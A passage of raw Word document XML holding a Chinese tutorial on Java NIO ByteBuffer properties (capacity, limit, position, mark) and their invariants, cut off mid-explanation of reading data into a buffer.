        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：指定还有多少数据需要取出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在从缓冲区写入通道时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，或者还有多少空间可以放入数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在从通道读入缓冲区时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00B62648" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>apacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>指定了可以存储在缓冲区中的最</w:t>
      </w:r>
      <w:hyperlink r:id="rId117" w:tgtFrame="_blank" w:tooltip="Hadoop知识库" w:history="1">
        <w:r w:rsidR="00F00E2B">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="DF3434"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>大数据</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>容量，实际上，它指定了底层数组的大小，或者至少是指定了准许我们使用的底层数组的容量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B62648" w:rsidRDefault="00B62648" w:rsidP="00B62648">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="300" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一个临时存放的位置下标。调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mark()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>会将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>设为当前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值，以后调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>reset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>会将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值总是小于等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值，如果将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值设的比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>小，当前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>值会被抛弃掉。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B62648" w:rsidRDefault="00B62648" w:rsidP="00B62648">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="300" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这些属性总是满足以下条件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>0 &lt;= mark &lt;= position &lt;= limit &lt;= capacity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B62648" w:rsidRDefault="00B62648" w:rsidP="00B62648">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="300" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值除了通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>函数来设置，也可以通过下面这些函数来改变：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B62648" w:rsidRPr="00B62648" w:rsidRDefault="00B62648" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>以上四个属性值之间有一些相对大小的关系：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0 &lt;= position &lt;= limit &lt;= capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。如果我们创建一个新的容量大小为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ByteBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象，在初始化的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>被设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，在以后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ByteBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象过程中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值不会再发生变化，而其它两个个将会随着使用而变化。四个属性值分别如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4985468" cy="2002496"/>
            <wp:effectExtent l="19050" t="0" r="5632" b="0"/>
            <wp:docPr id="213" name="图片 3" descr="http://hi.csdn.net/attachment/201107/17/0_1310888696L9mG.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hi.csdn.net/attachment/201107/17/0_1310888696L9mG.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4987780" cy="2003425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234A3D">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>现在我们可以从通道中读取一些数据到缓冲区中，注意从通道读取数据，相当于往缓冲区中写入数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。如果读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个自己的数据，则此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
